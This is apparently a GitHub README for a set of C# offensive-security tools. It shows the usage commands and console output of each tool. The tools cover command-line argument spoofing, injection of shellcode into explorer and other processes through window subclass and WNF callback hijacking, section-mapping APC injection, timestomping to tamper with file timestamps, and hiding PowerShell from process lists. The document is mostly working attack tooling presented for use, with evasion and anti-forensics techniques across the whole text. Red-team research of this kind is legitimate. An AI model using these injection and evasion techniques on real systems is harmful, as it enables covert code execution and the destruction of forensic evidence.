Also known by Microsoft as Knifecoat :hot_pepper:
Also known by Microsoft as Knifecoat :hot_pepper:
The king is dead, long live the king. I am starting a new repo with code samples in C#. My heart is still with PowerShell SwampThing.exe -l C:\Windows\System32\notepad.exe -f C:\aaa.txt -r C:\bbb.txt
/
:;
|l _____ |;
8o __-~ ~\ d| Swamp "88p;. -._\_;.oP Thing >,% (\ (./)8"
,;%%%: ./V^^^V'
;;;,-::::::'::\ ||
8888oooooo. :`^^^/,,~--.
oo.8888888888:((( o.ooo888 o88888888b )) 888b8888
b888888888;(.,"888b888\ .... b8888888:::::.8888. :::. :::OOO:::::::.OO' ;
`. "``::::::''.' ~ b33f ~
[>] CreateProcess -> Suspended [+] PE Arch : 64-bit [+] Process Id : 10568 [+] PEB Base : 0xA3C2431000 [+] RTL_USER_PROCESS_PARAMETERS : 0x20DA9760000 [+] CommandLine : 0x20DA9760070 [+] UNICODE_STRING |-> Len : 66 |-> MaxLen : 68 |-> pBuff : 0x20DA9760658
[>] Rewrite -> RTL_USER_PROCESS_PARAMETERS [+] RtlCreateProcessParametersEx : 0xEAADF0 [+] RemoteAlloc : 0xEA0000 [+] Size : 1776 [?] Success, sleeping 500ms..
[>] Reverting RTL_USER_PROCESS_PARAMETERS [+] Local UNICODE_STRING : 0xEBC4D0 [+] Remote UNICODE_STRING.Buffer : 0x20DA9B10000 [+] pRTL_USER_PROCESS_PARAMETERS : 0x20DA9870FE0 [?] Success rewrote Len, MaxLen, Buffer..
…
C:> DesertNut.exe -i
, ' . ' ,
. . ' . ,
. ' +
+ .-'''''-.
.' . + . ________|| ___ : : | / || . '___ ____/ \ : : ||. _/ || ||\_______/ \ / \ : _/| : || / ,.|| ||
/ , ' . \ : =// : |'____ || || || .
| __._/ | .' ___| \__ \\|| ||... , \ l|, ' ( / ,|...-' \ ' , __\||_//___ ___|____ \_/^\/||__ , . ,__ ||// \ . , _/~ ''~' _ ''( ....,||/ '
..,... _/ -'/ -._ __ | \ || _______ .
' \ \ -.\ /(1,.. || /
______/''''
[+] Searching for Subclass property.. [>] PID: 10928, ImageName: explorer |-> ParentClassName: Progman, ChildClassName: SHELLDLL_DefView [+] Duplicating Subclass header.. [>] hProc: 0x378 [>] hProperty: 0x6B14DD0 |-> uRefs: 2, uAlloc: 3, uCleanup: 0 |-> dwThreadId: 5804, pFrameCur: 0 |-> pfnSubclass: 0x7FFA20E42280 --> comctl32!CallOriginalWndProc (?) |-> uIdSubclass: 0, dwRefData: 0x7FFA2E4C07D0 [+] Allocating remote shellcode.. |-> Sc Len: 344 |-> Sc Address: 0x3220000 [+] Rewriting local SUBCLASS_HEADER.. [+] Allocating remote SUBCLASS_HEADER.. |-> Subclass header Len: 48 |-> Subclass header Address: 0x3260000 [+] Updating original UxSubclassInfo subclass procedure.. [+] Trigger remote shellcode --> notepad.. [+] Restoring original UxSubclassInfo subclass procedure.. [+] Freeing remote SUBCLASS_HEADER & shellcode..
C:> DesertNut.exe -l
, ' . ' ,
. . ' . ,
. ' +
+ .-'''''-.
.' . + . ________|| ___ : : | / || . '___ ____/ \ : : ||. _/ || ||\_______/ \ / \ : _/| : || / ,.|| ||
/ , ' . \ : =// : |'____ || || || .
| __._/ | .' ___| \__ \\|| ||... , \ l|, ' ( / ,|...-' \ ' , __\||_//___ ___|____ \_/^\/||__ , . ,__ ||// \ . , _/~ ''~' _ ''( ....,||/ '
..,... _/ -'/ -._ __ | \ || _______ .
' \ \ -.\ /(1,.. || /
______/''''
[+] Subclassed Window Properties [>] PID: 10928, ImageName: explorer |-> hProperty: 0x1BC84BF0, hParentWnd: 0xA0710, hChildWnd: 0x100650 |-> ParentClassName: Shell_TrayWnd, ChildClassName: Start
[>] PID: 10928, ImageName: explorer |-> hProperty: 0x1BC84C70, hParentWnd: 0xA0710, hChildWnd: 0x1C064C |-> ParentClassName: Shell_TrayWnd, ChildClassName: TrayDummySearchControl
[>] PID: 10928, ImageName: explorer |-> hProperty: 0x12A64F0, hParentWnd: 0x1C064C, hChildWnd: 0x800E8 |-> ParentClassName: TrayDummySearchControl, ChildClassName: Button
[>] PID: 10928, ImageName: explorer |-> hProperty: 0x12A58F0, hParentWnd: 0x1C064C, hChildWnd: 0x1504A4 |-> ParentClassName: TrayDummySearchControl, ChildClassName: Static
[>] PID: 10928, ImageName: explorer |-> hProperty: 0x12A5870, hParentWnd: 0x1C064C, hChildWnd: 0x110814 |-> ParentClassName: TrayDummySearchControl, ChildClassName: ToolbarWindow32
[...Snipped...]
…
C:> WindfarmDynamite.exe -i . .. ..___ .__ , | ||\ |[__ ...._ _ | \ .._ .. _ *-+- _ |/|| || (][ [ | )|__/_|[ )(][ | )| | (/, ._|
[+] Validating Process.. [>] PID: 996, ImageName: explorer |-> hProc: 632, Arch: x64
[+] Leaking local WNF_SUBSCRIPTION_TABLE.. [>] TblPtr: 0x7FFD99CB5FA8, NtdllRVA: 1335208
[+] Remote WNF_SUBSCRIPTION_TABLE lookup.. [>] rNtdllBase: 0x7FFD99B70000, rWNFSubTable: 0x5A9120 |-> NameTable Flink: 0x4A6CA10, NameTable Blink: 0x5BB050
[+] Finding remote subscription -> WNF_SHEL_LOGON_COMPLETE [>] SubscriptionId: 0xB89, State Name: WNF_SHEL_LOGON_COMPLETE |-> WNF_USER_SUBSCRIPTION: 0x49C8E38 |-> Callback: 0x7FFD82F58C60 => twinui.dll!DllCanUnloadNow |-> Context: 0x2A12F40 => N/A
[+] Allocating remote shellcode.. [>] Sc Len: 344 [>] Sc Address: 0x27A0000
[+] Rewriting WNF subscription callback pointer.. [+] NtUpdateWnfStateData -> Trigger shellcode [+] Restoring WNF subscription callback pointer & deallocating shellcode..
C:> WindfarmDynamite.exe -l 4132 . .. ..___ .__ , | ||\ |[__ ...._ _ | \ .._ .. _ *-+- _ |/|| || (][ [ | )|__/_|[ )(][ | )| | (/, ._|
[+] Validating Process.. [>] PID: 4132, ImageName: vmtoolsd |-> hProc: 640, Arch: x64
[+] Leaking local WNF_SUBSCRIPTION_TABLE.. [>] TblPtr: 0x7FFD99CB5FA8, NtdllRVA: 1335208
[+] Remote WNF_SUBSCRIPTION_TABLE lookup.. [>] rNtdllBase: 0x7FFD99B70000, rWNFSubTable: 0x56B2F0 |-> NameTable Flink: 0x58EA30, NameTable Blink: 0x58F070
[+] Reading remote WNF subscriptions.. [>] SubscriptionId: 0x931, State Name: WNF_ENTR_EDPENFORCEMENTLEVEL_POLICY_VALUE_CHANGED |-> WNF_USER_SUBSCRIPTION: 0x4BB5B88 |-> Callback: 0x7FFD87505DF0 => edputil.dll!EdpIsUIPolicyEvaluationEnabledForThread |-> Context: 0x0 => N/A
[>] SubscriptionId: 0x8FA, State Name: WNF_DX_MODE_CHANGE_NOTIFICATION |-> WNF_USER_SUBSCRIPTION: 0x5B9658 |-> Callback: 0x7FFD96E5B230 => SHCore.dll!Ordinal126 |-> Context: 0xA1ECB0 => N/A
[>] SubscriptionId: 0x8F9, State Name: WNF_DX_MONITOR_CHANGE_NOTIFICATION |-> WNF_USER_SUBSCRIPTION: 0x5B9708 |-> Callback: 0x7FFD96E5B230 => SHCore.dll!Ordinal126 |-> Context: 0xA1ECB0 => N/A
[>] SubscriptionId: 0x8F8, State Name: WNF_SPI_LOGICALDPIOVERRIDE |-> WNF_USER_SUBSCRIPTION: 0x5BA368 |-> Callback: 0x7FFD96E5B230 => SHCore.dll!Ordinal126 |-> Context: 0xA1ECB0 => N/A
[>] SubscriptionId: 0x8F4, State Name: WNF_RPCF_FWMAN_RUNNING |-> WNF_USER_SUBSCRIPTION: 0x58F828 |-> Callback: 0x7FFD98610980 => rpcrt4.dll!NdrTypeSize |-> Context: 0x0 => N/A
### MaceTrap
MaceTrap is a proof-of-concept for time stomping using SetFileTime. MaceTrap allows you to set the CreationTime / LastAccessTime / LastWriteTime for arbitrary files and folders. These elements can be changed individually, in bulk or can be duplicated from an existing file or folder. Time permitting I will update MaceTrap to include comprehensive PE compile time stomping as well (header, import table, export table, debug directory, resources and fixing up the checksum).
C:> MaceTrap.exe
/-|-\ MACE
[++++||>>|===|+ -|-/ TRAP b33f
--~~--> Args? 1999-10-20 => "2001-01-02 14:13" => "2019-02-19 01:01:01.111" -c (-Create) Boolean flag, overwrite CreationTime -a (-Access) Boolean flag, overwrite LastAccessTime -w (-Write) Boolean flag, overwrite LastWriteTime
--~~--> Usage? UrbanBishop.exe -i 3380 -p C:\Users\b33f\Desktop\sc.bin -c O _____ _ / //\ | | || |_ ___ ___ { } | | | _| . | .'| | _/ ||| |_|,||| (_) || _____ _ _ / \ | __ |_|| | ___ ___ () | __ -| | -| | . | . | () ||_||||| | /__\ || b33f
|-------- | Process : notepad | Handle : 828 | Is x32 : False
| Sc binpath : C:\Users\b33f\Desktop\sc.bin |
|---|
[>] Creating local section.. |-> hSection: 0x338 |-> Size: 31361 |-> pBase: 0x2470000 [>] Map RX section to remote proc.. |-> pRemoteBase: 0x16967970000 [>] Write shellcode to local section.. |-> Size: 31361 [>] Seek export offset.. |-> pRemoteNtDllBase: 0x7FFDE64A0000 |-> LdrGetDllHandle OK |-> RtlExitUserThread: 0x7FFDE650CF10 |-> Offset: 0x6CF10 [>] NtCreateThreadEx -> RtlExitUserThread Success [>] Set APC trigger & resume thread.. |-> NtQueueApcThread |-> NtAlertResumeThread [>] Waiting for payload to finish.. |-> Thread exit status -> 0 |-> NtUnmapViewOfSection
…
.---. .-----------
/ \ __ / ------
/ / \( )/ ----- Atomic
////// ' \/ ` --- Bird
//// / // : : ---
// / / /` '--
// //..\\ ~b33f~
====UU====UU====
'//||\\`
''``
Called ==> SystemProcessInformation Called ==> SystemProcessInformation Called ==> SystemProcessInformation Called ==> SystemProcessInformation Called ==> SystemProcessInformation [!] Found Powershell => rewriting linked list Called ==> SystemProcessInformation [!] Found Powershell => rewriting linked list Called ==> SystemProcessInformation [!] Found Powershell => rewriting linked list Called ==> SystemProcessInformation [!] Found Powershell => rewriting linked list Called ==> SystemProcessInformation [!] Found Powershell => rewriting linked list [!] Found Powershell => rewriting linked list
[...Snipped...]
…
C:> Londor.exe __ _ | | ___ ___ | |__ ___ | || . | | . | . | | ||||||||
~b33f
----> Args? ----> Usage? Londor.exe -t Coverage -s "C:\Windows\System32\notepad.exe" -o C:\Users\b33f\Desktop\test.drcov -a "C:\Users\b33f\Desktop\bla.txt" __ _ | | ___ ___ | |__ ___ | || . | | . | . | | ||||||||
~b33f
[>] Spawning process for coverage.. |-> PID: 5260; Path: C:\Windows\System32\notepad.exe |-> Script loaded
[*] Press ctrl-c to detach..
[+] Block trace Length: 107160 |-> BBS slice: 13395; Total BBS: 13395 [+] Block trace Length: 18456 |-> BBS slice: 2307; Total BBS: 15702 [+] Block trace Length: 76032 |-> BBS slice: 9504; Total BBS: 25206 [+] Block trace Length: 22216 |-> BBS slice: 2777; Total BBS: 27983 [+] Block trace Length:
No open issues yet, or sync has not completed.